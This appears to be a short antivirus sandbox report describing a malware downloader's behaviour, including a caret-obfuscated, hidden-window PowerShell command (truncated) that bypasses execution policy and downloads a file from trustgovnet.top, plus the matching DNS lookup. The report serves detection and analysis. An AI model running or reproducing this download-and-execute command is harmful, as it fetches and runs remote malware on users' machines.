Technical Information
Malicious functions
Downloads and executes
- http://trustgovnet.top/search.php as %appdata%.exe
Executes the following (exploit)
- '<SYSTEM32>\cmd.exe' /C "p^o^wE^RShElL.^eXe^ -EXe^cu^TiOn^PO^L^I^c^y^ b^Y^pAss^ -NOp^Ro^fi^Le -^wi^ND^o^W^sT^yLE HiddEN (^NEW-OB^j^ECt S^yS^t^E^m.N^eT^.we^b^c^LieNT).^do^w^nlOad^fIlE^('http://trustgovnet.to...
Network activity
UDP
- DNS ASK tr###govnet.top
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\cmd.exe' /C "p^o^wE^RShElL.^eXe^ -EXe^cu^TiOn^PO^L^I^c^y^ b^Y^pAss^ -NOp^Ro^fi^Le -^wi^ND^o^W^sT^yLE HiddEN (^NEW-OB^j^ECt S^yS^t^E^m.N^eT^.we^b^c^LieNT).^do^w^nlOad^fIlE^('http://trustgovnet.to...' (with hidden window)
